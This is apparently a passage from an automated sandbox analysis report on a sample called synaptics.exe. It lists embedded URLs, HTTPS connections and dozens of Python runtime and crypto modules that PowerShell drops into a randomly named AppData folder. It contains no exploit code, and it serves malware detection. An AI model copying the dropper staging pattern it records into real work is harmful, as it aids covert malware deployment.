00000014.00000003.2596221179.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2595014388.000000000190C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663076152.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738332591.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2675364813.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749443041.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2690894995.00000000016D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                Source: synaptics.exe, 00000014.00000003.2608627922.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599655096.0000000000AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                Source: synaptics.exe, 00000014.00000003.2516955463.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2564567996.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601360761.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521322653.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518928174.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521200941.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2569213339.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2519552085.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2516039697.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2533673642.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2529041976.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2607817795.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2531202744.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548822658.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2545729196.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543956442.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2524312967.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518549794.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                Source: synaptics.exe, 00000014.00000003.2665807066.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2656379556.0000000001B4F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672069361.0000000001535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                Source: synaptics.exeString found in binary or memory: https://python.org/dev/peps/pep-0263/
                Source: synaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2731721891.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627657717.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2596221179.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2595014388.000000000190C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663076152.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738332591.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2675364813.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749443041.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2690894995.00000000016D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                Source: synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749443041.00000000016DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioz
                Source: synaptics.exe, 00000014.00000003.2652617065.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635897530.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626064254.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635768503.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2659715215.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646681174.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2681756928.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672930458.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626188130.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631317671.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2668430759.0000000000B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                Source: synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#appendix-A
                Source: synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.3
                Source: synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-6.4.4
                Source: synaptics.exe, 00000014.00000003.2691596913.0000000003939000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684125738.0000000001BB1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                Source: synaptics.exe, 00000014.00000003.2652360470.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2673059885.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658121816.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2667401944.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html
                Source: synaptics.exe, 00000014.00000003.2631388045.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyz
                Source: synaptics.exe, 00000014.00000003.2619913019.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621884568.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2622302076.0000000001552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)
                Source: synaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc4627.txt
                Source: synaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2731721891.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627657717.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2596221179.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2595014388.000000000190C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663076152.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738332591.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2675364813.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749443041.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2690894995.00000000016D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                Source: synaptics.exe, 00000014.00000003.2516955463.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2564567996.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601360761.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521322653.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518928174.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521200941.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2569213339.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2519552085.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2516039697.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2533673642.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2529041976.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2607817795.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2531202744.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548822658.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2545729196.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543956442.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2524312967.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518549794.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                Source: synaptics.exe, 00000014.00000003.2588777958.0000000001932000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2589648322.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2565759692.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594703243.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                Source: synaptics.exe, 00000014.00000003.2512307678.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2507985486.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2511960109.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2507752180.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2509836397.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                Source: synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
                Source: synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                Source: synaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2647268662.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2629601575.00000000018E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2666415324.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2723906148.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663690600.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2676220591.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658366203.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652761780.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2634063079.0000000001931000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2639516326.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2687512306.000000000192F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                Source: synaptics.exe, 00000014.00000003.2691596913.0000000003939000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2719616397.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684125738.0000000001BB1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2734524871.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2702315091.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2691397567.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\python_tools.catJump to dropped file
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF65390 ?PyCryptImportKey@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_Py_NoneStruct,_PyArg_ParseTupleAndKeywords_SizeT,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,??1PyWinBufferView@@QAE@XZ,CryptImportKey,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,??0PyCRYPTKEY@@QAE@KPAU_object@@@Z,??1PyWinBufferView@@QAE@XZ,24_2_6BF65390

                System Summary

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libssl-1_1.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_lzma.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testconsole.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_des.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_queue.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_msi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\pyexpat.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD5.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\odbc.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ssl.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\pythonservice.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\sqlite3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libcrypto-1_1.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\servicemanager.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\select.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA256.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testmultiphase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_aes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_multiprocessing.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testinternalcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\unicodedata.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testbuffer.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA384.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_tkinter.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_hashlib.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testimportmultiple.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_overlapped.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libffi-7.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_socket.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\perfmon.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\winsound.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_Salsa20.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tk86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA512.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_bz2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_decimal.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_uuid.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_asyncio.pydJump to dropped file
